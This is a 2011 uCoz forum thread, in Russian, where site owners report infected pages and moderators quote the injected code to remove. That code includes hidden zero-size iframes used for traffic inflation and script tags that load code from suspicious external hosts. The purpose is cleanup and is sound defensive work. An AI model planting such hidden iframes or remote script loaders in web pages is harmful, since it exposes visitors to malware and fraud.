Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Добрый вечер. Уважаемые модераторы у меня на сайте http://www.alex-city.ru завёлся крот под именем HEUR:Trojan-Downloader.Script.Generic Google Chrome http://jgtuy.cz.cc/index.php?tp=e7436caee0ad8bec//JIM
Да и многие пользователи начали жаловаться на загрузку этой хрени доступ к сайту только у меня, как он мог туда попасть не представляю подскажите как его найти чтоб удолить. |
|
Вот такой
Code <iframe src="http://vaseapupkin.ucoz.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe> И такой Code <iframe frameborder="0" width="220" scrolling="no" style="height:330px;background-color:#DDFBBF;border-bottom:1px solid #29852C;border-left:1px solid #29852C" src="http://sticker.yadro.ru/ad/218x330.html?place=17;layout=ucoz-square;bgcol or=DDFBBF;fgcolor=CC002B`)};uaw='+(window.innerWidth || (document.documentElement && document.documentElement.clientWidth) || document.body.clientWidth)+'"></iframe> Добавлено (24-Фев-2011, 22:51:09) Code Your IP was temporary blocked due to high requests flow. Ваш IP был временно заблокирован по причине слишком высокого потока запросов. Через некоторое время опять захожу на сайт чуть-чуть посижу и опять такая надпись Code Your IP was temporary blocked due to high requests flow. Ваш IP был временно заблокирован по причине слишком высокого потока запросов. Момогите пожалуйста ! Что делать??? |
|
P@R@VoZiK, ифрейма от васи пупкина у вас нет. зато есть очень грязный рип длешного шаблона. проблемы с блокировками именно оттуда.
вот эти два шедевра например Code http://www.live-gamez.ru/panel/padding.js http://www.live-gamez.ru/panel/contentslider.js а так же мини-чат |
|
support5207, радио ваше довольно гадкое и криво вставленное
я про это Code src="http://stream8.radiostyle.ru:8008/alextest" |
|
Здравствуйте, у меня возникла такая проблема, при заходе на свой сайт http://wmbizness.at.ua с чужого компьютера и опера и гугл хром выдают сообщение что мой сайт содержит вирус который распространяется через сайт www.l2bz.at.ua хотя никакого отношения к этому сайту я не имею!!! Я смотрел код своего сайта но даже намека на даный вирусоносный ресурс нет. Кстати при заходе на даный сайт (www.l2bz.at.ua) у меня действительно срабатывает антивирусная защита. Посмотрите пожалуйста, спасибо
|
|
admindekor, самый низ сайта. вот эти два шедевра удалить
Quote <script language="JavaScript" src="http://traffru.com/js/peeldown.php?id=2976"></script> <script language="JavaScript" charset="cp1251" src="http://cxgcrgedg.ru/code/?tps=iframe&id=1790"></script> </body>
удалить Quote <!--U1AHEADER1Z--><TABLE border="0" cellpadding="0" cellspacing="0" width="100%" style="background: url('/.s/t/241/1.gif') repeat-x #686D73;"><TBODY><TR><TD align="center"> <TABLE cellpadding="0" cellspacing="0" border="0" width="780" height="254" class="header_table"><TBODY><TR><TD height="83" style="background: url('/.s/t/241/2.gif') no-repeat left; padding-left: 100px;"><SPAN style="color:#FFFFFF;font:20pt bold Verdana,Tahoma;"><FONT face="Palatino Linotype"><FONT color="#ffa500"><STRONG>Art of color from KuzmA</STRONG></FONT></FONT></SPAN></TD><TD align="right" style="color: white;">Суббота, 26.02.2011, 19:54<BR><BR><BR><!--%IFEL3%1%><!<s5212>>Приветствую Вас<!</s>> <b>Гость</b><!%IFEN3%1%--> | <A href="http://wmbizness.at.ua/news/rss/">RSS</A></TD></TR><TR><TD height="132" colspan="2"><IMG src="/.s/t/241/3.jpg" border="0"></TD></TR><TR><TD height="39" style="background: url('/.s/t/241/4.jpg') no-repeat left;" colspan="2" align="right"><IMG src="/.s/t/241/5.gif" border="0" align="absmiddle"><A href="http://wmbizness.at.ua/"><!--<s5176>-->Главная<!--</s>--></A> <!--%IFEL8%1%><img src="/.s/t/241/5.gif" border="0" align="absmiddle"><a href="http://wmbizness.at.ua/index/3"><!<s3089>>Регистрация<!</s>></a><!%IFEN8%1%--> <!--%IFEL11%1%><img src="/.s/t/241/5.gif" border="0" align="absmiddle"><a href="javascript://" rel="nofollow" onclick="new _uWnd('LF',' ',-250,-110,{autosize:0,closeonesc:1,resize:1},{url:'/index/40'});return false;"><!<s3087>>Вход<!</s>></a><!%IFEN11%1%--><IMG src="/.s/t/241/5.gif" border="0" align="absmiddle"></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE> <DIV align="center"><script src="http://romale80.ucoz.ru/media/?t=video;w=560;h=100;f=http%3A%2F%2Fromale80.ucoz.ru%2FMovie1.swf" type="text/javascript"></script></DIV><!--/U1AHEADER1Z--> |
|
Здравствуйте!
Помогите разобраться. Пользователи стали жаловаться, что в их сообщениях стали появляться ссылки на другие сайты. Что делать, посоветуйте! Вот здесь http://www.argerusa.com/forum/10-190-13153-16-1298813313 P.S. Еще и сайт при этом медленно открывается или вообще не открывается. Сообщение отредактировал Daniela - Воскресенье, 27 Фев 2011, 23:55:59
|
|
Daniela, с добавлением ссылок у пользователя - это локальные проблемы вашего пользователя.
на счет тормозов сайта. у вас 104 сервер, с ним проблем нет. и с отключенным активным содержимым ваш сайт влетает мгновенно на счет тормозов стоит задуматься над подрузкой всего лишнего. вы должны понимать, что таблица с флагами висит на чужом хосте и подгружает весь этот ужас извне и ваша страница зависит от работоспособности сайта, который и отдает весь этот ужас. вот сейчас проверила на ответ вот это Bonbone здорово подтормаживает. думаю от лишнего мусора стоит почиститься лишним мусором является в первую очередь Code <!--begin of Bonbone--> <a href='http://bonbone.ru/' title='Популярный каталог интернет ресурсов'> <img src='http://bonbone.ru/bon.php?44948' width=88 height=31 border=0></a> <!--end of Bonbone--> вот это тоже довольно бесполезная и тяжелая штука Code <!-- GoStats JavaScript Based Code --> <script type="text/javascript" src="http://gostats.ru/js/counter.js"></script> <script type="text/javascript">_gos='c5.gostats.ru';_goa=1054008; _got=5;_goi=1;_gol='сайт статистики';_GoStatsRun();</script> <noscript><a target="_blank" title="сайт статистики" href="http://gostats.ru"><img alt="сайт статистики" src="http://c5.gostats.ru/bin/count/a_1054008/t_5/i_1/counter.png" style="border-width:0"></a></noscript> <!-- End GoStats JavaScript Based Code --> |
|
Всем доброго дня.
Уважаемые пользователи, пожалуйста помогите найти вредоносный код на сайте: http://vspot.at.ua/ Заранее благодарю за помощь. Добавлено (28-Фев-2011, 07:59:02) |
|
hamburger, из блока статистики убрать код:
Code <script language="JavaScript"src="http://smfile.3dn.ru/iGo.js"></script> из блока нас смотрят, убрать: Code <script type="text/javascript" src="http://jb.revolvermaps.com/r.js"></script> из блока лучший пользователь удалить: Code <script type="text/javascript" src="http://pro-zp.narod.ru/base.js"></script> из блока часы удалить: Code <script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script> всё это в панели управления-управление дизайном |
|
Scorpik427,
Quote из блока нас смотрят, убрать: Code <script type="text/javascript" src="http://jb.revolvermaps.com/r.js"></script> а вот ифрейм от reff.moy.su раздается вместе с блоками и со всякими информерами и является накруткой hamburger, это тоже удалить Code <IFRAME SRC="http://reff.moy.su/" WIDTH="0" HEIGHT="0" NAME="iframe" SCROLLING="auto" FRAMEBORDER=0></IFRAME> а вообще сайтик грязный на форуме нашла семь битых скриптов почитайте это //forum.ucoz.ru/forum/45-35735-1 а это особенно почитайте //forum.ucoz.ru/forum/45-35733-1 и не ставьте к себе на сайт все что найдете в интернете |
|
Доброго Вам дня.
У меня такая порблемка, при проверке моего сайта на вирусы, пишет угроз не обнаружено. Также когда я добавляю фильм, я проверяю обложку, описание и сам код плеера, всё чисто. Но при проверки страницы уже с фильмом, пишет "возможно есть вредоносный код!". Пожалуйста, помогите разобратся с этой неприятностью. Вот адрес сайта: http://vspot.at.ua/ |
|
Автор_Vspot, возможно на фрейм ругается, а так ничего подозрительного не нашел
спартак никогда не умрет!
|
|
я вже створюю напевно 5-ий сайт!!! все нормальну спочатку поки не перезагружу комп потім коли нажимаю головна сторінка вибиває якийсь віруc d48.rsdynamic.ru/go/php?url=http%3A%2F% ......і так далі що робити???
Добавлено (01-Мар-2011, 17:38:52) |
| |||
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!